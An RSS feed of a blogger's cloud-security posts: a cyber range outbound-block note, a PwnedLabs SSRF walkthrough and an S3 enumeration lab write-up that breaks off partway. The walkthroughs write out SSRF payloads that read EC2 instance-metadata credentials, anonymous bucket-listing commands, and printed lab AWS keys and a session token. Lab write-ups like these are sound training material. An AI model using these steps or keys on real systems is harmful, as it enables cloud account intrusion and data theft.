<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Khang Tran</title>
    <description>The latest articles on DEV Community by Khang Tran (@aktran321).</description>
    <link>https://dev.to/aktran321</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1726976%2F2fba09ce-74f7-4d59-8bc3-9ea92110908b.png</url>
      <title>DEV Community: Khang Tran</title>
      <link>https://dev.to/aktran321</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/aktran321"/>
    <language>en</language>
    <item>
      <title>Cyber Range Crypto Attack Incident Response</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Fri, 21 Mar 2025 23:09:04 +0000</pubDate>
      <link>https://dev.to/aktran321/cyber-range-crypto-attack-incident-response-3cgc</link>
      <guid>https://dev.to/aktran321/cyber-range-crypto-attack-incident-response-3cgc</guid>
      <description>&lt;p&gt;Since joining the cyber range community just a week ago, there has already been a security incident where linux virtual machines have been compromised. This is due to machines using the same default credential "labuser:Cyberlab123!".&lt;/p&gt;

&lt;p&gt;Below is the official notice from Azure. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqqt4xoyebzmsuqfbt6b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqqt4xoyebzmsuqfbt6b.png" alt="Notice from Azure" width="800" height="1020"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since the purpose of the Cyber Range is to simulate a real-world corporate network environment, we still want to allow inbound attacks. &lt;/p&gt;

&lt;p&gt;However, to prevent anyone from accidentally or intentionally attacking assets outside the Cyber Range, the following Network Security Group rules were implemented to block the most common OUTBOUND traffic on ports such as SSH (22), RDP (3389), SMB (445), and other known crypto-miner ports.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdjbztuk4zwpo65451v85.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdjbztuk4zwpo65451v85.png" alt="NSG Blocking OUTBOUND traffic" width="800" height="475"&gt;&lt;/a&gt;&lt;/p&gt;
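
&lt;p&gt;For reference, an outbound deny rule like the ones above can also be scripted with the Azure CLI. This is a minimal sketch with placeholder resource group, NSG, and rule names, not the exact rules in the screenshot; the same pattern repeats for RDP (3389), SMB (445), and the miner ports:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Placeholder names; deny outbound SSH from the range
az network nsg rule create \
  --resource-group CyberRangeRG \
  --nsg-name CyberRangeNSG \
  --name Deny-Outbound-SSH \
  --priority 100 \
  --direction Outbound \
  --access Deny \
  --protocol Tcp \
  --destination-port-ranges 22
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;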

</description>
    </item>
    <item>
      <title>SSRF Attack</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Thu, 21 Nov 2024 13:58:49 +0000</pubDate>
      <link>https://dev.to/aktran321/ssrf-attack-1cf6</link>
      <guid>https://dev.to/aktran321/ssrf-attack-1cf6</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flu934o22fo806dxw09yq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flu934o22fo806dxw09yq.png" alt="Image description" width="800" height="554"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://pwnedlabs.io/labs/ssrf-to-pwned" rel="noopener noreferrer"&gt;https://pwnedlabs.io/labs/ssrf-to-pwned&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Scenario
&lt;/h2&gt;

&lt;p&gt;Rumors are swirling on hacker forums about a potential breach at Huge Logistics. Your team has been monitoring these conversations closely, and Huge Logistics has asked you to assess the security of their website. Beyond the surface-level assessment, you're also to investigate links to their cloud infrastructure, mapping out any potential risk exposure. The question isn't just if they've been compromised, but how deep the rabbit hole goes.&lt;/p&gt;

&lt;h5&gt;
  
  
  52.6.119.121 : hugelogistics.pwn
&lt;/h5&gt;

&lt;p&gt;We edit our &lt;code&gt;/etc/hosts&lt;/code&gt; file to map the above IP to the hugelogistics.pwn domain.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo nano /etc/hosts&lt;/code&gt;&lt;/p&gt;
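
&lt;p&gt;The appended line simply maps the IP to the hostname:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;52.6.119.121    hugelogistics.pwn
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;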

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx8d10buz3oxt2xuin61z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx8d10buz3oxt2xuin61z.png" alt="Image description" width="800" height="354"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Navigate to &lt;a href="http://hugelogistics.pwn" rel="noopener noreferrer"&gt;http://hugelogistics.pwn&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsmfkyg1pyxlfqqqdpkx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsmfkyg1pyxlfqqqdpkx.png" alt="Image description" width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can find more information about the organization that owns the IP address:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;whois 52.6.119.121
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We see that the owner is Amazon, and more specifically the Amazon EC2 service.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58j1iyv6ihwkr3cr1uxl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58j1iyv6ihwkr3cr1uxl.png" alt="Image description" width="800" height="342"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If we inspect the website's &lt;code&gt;img&lt;/code&gt; tags, we notice that the images are stored in an S3 bucket at &lt;code&gt;https://huge-logistics-storage.s3.amazonaws.com/&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;img src="https://huge-logistics-storage.s3.amazonaws.com/web/images/about.jpg" alt="" class="img-fluid"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Browsing the bucket reveals two folders, &lt;code&gt;web&lt;/code&gt; and &lt;code&gt;backup&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Looking back at the website, we find a new page. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55nrtxs7foq0wqht2rk4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55nrtxs7foq0wqht2rk4.png" alt="Image description" width="800" height="202"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the button with developer tools, we see a form field called "name" that's submitted when we click the button, with a default value of "hugelogistics.pwn".&lt;/p&gt;

&lt;p&gt;Clicking the button, we see this service status page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0g31u4z7shwe1hamk97l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0g31u4z7shwe1hamk97l.png" alt="Image description" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The web app appears to make a request from the back-end server to fetch this data. This indicates it may be vulnerable to SSRF (Server-Side Request Forgery). &lt;/p&gt;

&lt;p&gt;We assume the website is hosted on an EC2 instance, so we can attempt an HTTP GET request to the Instance Metadata Service (IMDS) at the link-local address 169.254.169.254.&lt;/p&gt;

&lt;p&gt;We replace &lt;code&gt;hugelogisticsstatus.pwn&lt;/code&gt; with &lt;code&gt;169.254.169.254/latest/meta-data&lt;/code&gt; and navigate to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://hugelogistics.pwn/status/status.php?name=169.254.169.254/latest/meta-data
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhbcpw1nzs0aynhj32vk5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhbcpw1nzs0aynhj32vk5.png" alt="Image description" width="800" height="285"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This request reveals an IAM role &lt;code&gt;MetapwnedS3Access&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://hugelogistics.pwn/status/status.php?name=169.254.169.254/latest/meta-data/iam/info
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87wkiw9yyqecljtl3des.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87wkiw9yyqecljtl3des.png" alt="Image description" width="800" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can then retrieve the IAM role's temporary credentials.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://hugelogistics.pwn/status/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/MetapwnedS3Access
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8cn9ypvv4gehv6x1f30.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8cn9ypvv4gehv6x1f30.png" alt="Image description" width="800" height="157"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Access Key: &lt;code&gt;ASIARQVIRZ4UKPLCJVVZ&lt;/code&gt;&lt;br&gt;
Secret Access Key: &lt;code&gt;MfQf6dRXY9q1E2oDX74sqv7ULs3rW9uIu7s4VXE1&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure set aws_session_token "&amp;lt;token value&amp;gt;"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;IQoJb3JpZ2luX2VjEA4aCXVzLWVhc3QtMSJGMEQCIGLKaluB2S92Ar+YUOcyXI8vTgOY+n/AXgYUezfJyBSfAiBc6fVCXR0GBxEiRPPoxkTL80+Tkz4ChUmBx9G2vaCSNyrEBQim//////////8BEAAaDDEwNDUwNjQ0NTYwOCIM7eSp4B/C8Du219mSKpgFUqmhsZ5AiJi3VSVfNIUnitYObN4OUieI7GKuY4xRJqRJWnM7R/UmXgsFSp2K689l+u3z9uhFM6/EEGmccpXvsp4E2XwHPyHGY2KgFByji2Ih8b5oYH8bX4IqidPHOjonOiuvmK+sPkBzV+Cp5Wh3bkmp7oRtHPvHl73TrqM4Q/ZXEkZW1LXyAEsJGvQuotSP2plH7JOzjCgNZf+8ZzySUPeVNtlJjxlqe/nukY/sR375PT2KkjEmru69TN2nzmB9IzGO47UrAAycqwWV7xcSpDU8XQlcwNxoXO+9vnP7jZYKxAym7gbZxFd6EYbf/L1o7xohcG2WzIuZIuPyVtbsmY/XMhQOsCRGqZZecFAxkiKSjlI31cV88AgZoPCU2mzY0lfSpf80MLyR1gk+6wB/copoqI2u2LWGgeyt1UVcqcYS7vLVpaoUik06Caa/4F3vHXhxje8x2eaowdk6bRG59m/XEYkWx/9i1BMiaLrDNRH1Ik6p/um+oaqwxNbZ7TOggpN25bauSxaDBkjHgQ2ORwqm6bDhjoEsKI/YlkadlA7WthssiC1s6DJ0QLW83IvOJ/YFKBkXHYbdgicjD+RKQcAm1u/e3fYR0isb8SeJH6M6Cp9aZ5WFUN37wKj+X4Z05/lkq3JGxmwwN3/paJI/dnj3zs8h6xLViA5V7OOsugB7b+cKqe0pwn4nAEmFvWCD9pZ73rKyItWVpxAtkeN2GVhY2iashzuz8kQmvvIP/VkMoERC6qQQYVuIdjYEI5KN/iqUBSYZSmnG5wCHdhil8z6K/mZapcAUBfZ9WesgXC92dx/XgWaiIfNvxrqO3Kf/a3oW6t+mwZiQgTzc6yuDE8jGVkDV3OUwudJI/LLXhUfoAPCgIHiv2zDj4/y5BjqyAffVg3FjFSCYNM/HqUgzgIas6TOLXp4GEQOpuqlQWyBwPjF41Y8qLJX/a56cnfzSs6RsqCAXvROJM7aV+40wj47B2WmGM2b9HG3b3vN68aNwqTG7cmOh09jeAJvilB8i0Yr+QUHIheg387DUpbc9+vn6JEhOuyHtBzAogJ/tc0oKfiiVTbJP+j81u0wSz8gkiMMoSp0MD7hf9WWNMfenZBzBztmPNGC9Yd6LIBTEpNyWwGo=
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Khangs-MBP:~ khangtran$ aws sts get-caller-identity
{
    "UserId": "AROARQVIRZ4UCHIUOGHDS:i-0199bf97fb9d996f1",
    "Account": "104506445608",
    "Arn": "arn:aws:sts::104506445608:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With this role's credentials, we can access the bucket and retrieve the flag!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 cp s3://huge-logistics-storage/backup/flag.txt .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This attack was easy to perform because the EC2 instance did not enforce IMDSv2, which allowed us to read the credentials stored in the instance metadata with simple GET requests. &lt;/p&gt;
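
&lt;p&gt;For contrast, IMDSv2 requires a session token obtained via a PUT request before any metadata can be read, something a basic GET-based SSRF like this one cannot do:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# IMDSv2: first fetch a session token with a PUT request...
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# ...then present it on every metadata request
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;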

</description>
    </item>
    <item>
      <title>S3 Enumeration</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Thu, 21 Nov 2024 11:58:00 +0000</pubDate>
      <link>https://dev.to/aktran321/s3-enumeration-53hd</link>
      <guid>https://dev.to/aktran321/s3-enumeration-53hd</guid>
      <description>&lt;p&gt;&lt;a href="https://pwnedlabs.io/" rel="noopener noreferrer"&gt;PWNED Labs&lt;/a&gt; is a great resource to get your hands dirty with AWS Penetration Testing. &lt;/p&gt;

&lt;p&gt;Today, I'll be going through the &lt;a href="https://pwnedlabs.io/labs/aws-s3-enumeration-basics" rel="noopener noreferrer"&gt;S3 Enumeration&lt;/a&gt; lab showcasing how easy it is to access an S3 bucket!&lt;/p&gt;

&lt;h2&gt;
  
  
  Scope
&lt;/h2&gt;

&lt;p&gt;It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.&lt;/p&gt;

&lt;h2&gt;
  
  
  Target
&lt;/h2&gt;

&lt;p&gt;&lt;a href="http://dev.huge-logistics.com" rel="noopener noreferrer"&gt;http://dev.huge-logistics.com&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxygj8brv39h2njmlmfgj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxygj8brv39h2njmlmfgj.png" alt="Image description" width="800" height="505"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc0c4ambijqqcqxhqj52.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc0c4ambijqqcqxhqj52.png" alt="Inspection" width="800" height="239"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see that the website uses an S3 bucket called &lt;code&gt;dev.huge-logistics.com&lt;/code&gt; for storing static files such as images, CSS, and JavaScript.&lt;/p&gt;

&lt;p&gt;While attempting to access &lt;a href="https://s3.amazonaws.com/dev.huge-logistics.com/" rel="noopener noreferrer"&gt;https://s3.amazonaws.com/dev.huge-logistics.com/&lt;/a&gt; and &lt;a href="https://s3.amazonaws.com/dev.huge-logistics.com/static/" rel="noopener noreferrer"&gt;https://s3.amazonaws.com/dev.huge-logistics.com/static/&lt;/a&gt;, we get an access denied.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh349g32q8bd6oy6mq2li.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh349g32q8bd6oy6mq2li.png" alt="Image description" width="800" height="149"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So we can try accessing it with the AWS CLI instead. &lt;/p&gt;

&lt;p&gt;We specifically use the &lt;code&gt;--no-sign-request&lt;/code&gt; flag.&lt;/p&gt;

&lt;p&gt;This flag amounts to accessing the bucket anonymously, much like connecting to a misconfigured FTP server that allows anonymous sign-in. &lt;/p&gt;

&lt;p&gt;Basically, we are enumerating the S3 bucket without having to authenticate ourselves.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 ls s3://dev.huge-logistics.com --no-sign-request
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zi91vxnwxtjg8mco8so.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zi91vxnwxtjg8mco8so.png" alt="Image description" width="800" height="186"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now that we can see the contents of the bucket, we can try recursive enumeration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But access is denied.&lt;/p&gt;

&lt;p&gt;However, accessing the shared directory works and we find a zip file that we can download.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Khangs-MBP:~ khangtran$ aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 11:08:33          0
2023-10-16 11:09:01        993 hl_migration_project.zip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Download&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unzipping the file reveals a PowerShell script.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fluv3cq0zcv35w622uorg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fluv3cq0zcv35w622uorg.png" alt="Image description" width="760" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inside the file, we discover hardcoded access keys!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Khangs-MBP:~ khangtran$ cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

# Set the AWS region
Set-DefaultAWSRegion -Region $region

# Read the secrets from export.xml
[xml]$xmlContent = Get-Content -Path "export.xml"

# Output log file
$logFile = "upload_log.txt"

# Error handling with retry logic
function TryUploadSecret($secretName, $secretValue) {
    $retries = 3
    while ($retries -gt 0) {
        try {
            $result = New-SECSecret -Name $secretName -SecretString $secretValue
            $logEntry = "Successfully uploaded secret: $secretName with ARN: $($result.ARN)"
            Write-Output $logEntry
            Add-Content -Path $logFile -Value $logEntry
            return $true
        } catch {
            $retries--
            Write-Error "Failed attempt to upload secret: $secretName. Retries left: $retries. Error: $_"
        }
    }
    return $false
}

foreach ($secretNode in $xmlContent.Secrets.Secret) {
    # Implementing concurrency using jobs
    Start-Job -ScriptBlock {
        param($secretName, $secretValue)
        TryUploadSecret -secretName $secretName -secretValue $secretValue
    } -ArgumentList $secretNode.Name, $secretNode.Value
}

# Wait for all jobs to finish
$jobs = Get-Job
$jobs | Wait-Job

# Retrieve and display job results
$jobs | ForEach-Object {
    $result = Receive-Job -Job $_
    if (-not $result) {
        Write-Error "Failed to upload secret: $($_.Name) after multiple retries."
    }
    # Clean up the job
    Remove-Job -Job $_
}

Write-Output "Batch upload complete!"


# Install-Module -Name AWSPowerShell -Scope CurrentUser -Force
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can reconfigure our AWS CLI with these keys, which should give us further access to the S3 bucket.&lt;/p&gt;

&lt;p&gt;But let's first check which region the bucket was created in.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl -I https://s3.amazonaws.com/dev.huge-logistics.com/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd72a0xbvbglhwwe2fb07.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd72a0xbvbglhwwe2fb07.png" alt="Image description" width="800" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;x-amz-bucket-region&lt;/code&gt; response header shows &lt;code&gt;us-east-1&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And use &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;access key: &lt;code&gt;AKIA3SFMDAPOWOWKXEHU&lt;/code&gt; &lt;/li&gt;
